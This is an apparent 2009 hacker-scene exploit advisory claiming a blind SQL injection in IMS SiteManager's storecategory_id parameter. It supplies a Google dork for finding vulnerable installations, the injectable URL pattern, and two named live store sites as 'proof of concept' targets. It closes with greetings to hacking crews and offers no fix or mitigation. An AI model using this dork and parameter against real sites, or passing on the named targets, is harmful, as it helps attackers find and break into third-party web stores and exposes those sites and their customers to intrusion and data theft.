[o]------------------------------------------------------------------------------------[x]
| Blind SQL Injection Vulnerability
|
[o]------------------------------------------------------------------------------------[o]
| Software : IMS SiteManager
|
| Vendor : www.sitemanager.ims.net
|
| Date : 13 sept 2009
|
| Author : zxvf
|
| Contact : paddy[at]antisecurity[dot]org
|
[o]------------------------------------------------------------------------------------[o]
[?] Google Dork
"Powered by IMS SiteManager"
[?] Exploit
http://[site]/index.php?storecategory_id=
[?] Proof of Concept
https://www.rainfordane.com/order/index.php?storecategory_id=247
https://www.downtownmadison.org/store/index.php?storecategory_id=223
[o]------------------------------------------------------------------------------------[x]
| Greetz
|
[o]------------------------------------------------------------------------------------[o]
| AntiSecurity Crew
|
| Mainhack Crew
|
| Nob0dy Crew
|
| c0li, OoN_Boy, NoGe, paman, pizzyroot, noname, angela, eminem, xx_user,
|
| Special for Dipsy
|
| Armageddon Team, and all indonesian hacker!
|
| BeHave oR BeGone !!!
|
[o]------------------------------------------------------------------------------------[o]
Saturday, September 19, 2009
IMS SiteManager Blind SQL Injection Vuln
